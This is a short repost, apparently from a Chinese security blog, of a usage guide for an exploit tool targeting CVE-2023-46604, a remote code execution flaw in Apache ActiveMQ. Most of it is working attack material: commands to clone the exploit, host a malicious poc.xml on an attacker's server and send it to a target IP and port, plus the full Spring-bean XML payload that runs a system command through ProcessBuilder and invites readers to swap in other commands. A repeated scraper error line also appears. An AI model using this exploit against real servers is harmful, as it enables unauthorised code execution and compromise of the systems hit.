CVE-2023-46604 之 ActiveMQ RCE 漏洞验证/利用工具
read file error: read notes: is a directory 2023-11-8 19:25:8 Author: Ots安全(查看原文) 阅读量:42 收藏
read file error: read notes: is a directory 2023-11-8 19:25:8 Author: Ots安全(查看原文) 阅读量:42 收藏
# 拉取源码git clone https://github.com/sule01u/CVE-2023-46604.git# 进入目录cd CVE-2023-46604# 将poc.xml部署到http服务(Deploy on your vps)python3 -m http.server# 发送pocpython3 CVE-2023-46604.py -i target_ip -p target_port --xml http://vps_ip:8000/poc.xml
本地环境测试效果
poc.xml : 你可以通过修改poc.xml中的rce命令来做不同的验证
<?xml version="1.0" encoding="UTF-8" ?><beans xmlns="http://www.springframework.org/schema/beans"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"><bean id="pb" class="java.lang.ProcessBuilder" init-method="start"><constructor-arg ><list><value>open</value><value>-a</value><value>Calculator</value></list></constructor-arg></bean></beans>
项目地址:
https://github.com/sule01u/CVE-2023-46604
感谢您抽出
.
.
来阅读本文
点它,分享点赞在看都在这里
文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247502755&idx=3&sn=9c0043790bdb4a6f7144d85bdc267143&chksm=9bad82e8acda0bfea80eaee72b79ffd3ccb2e42f553f89332bca5bb008dc6eb958603b94a95b&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh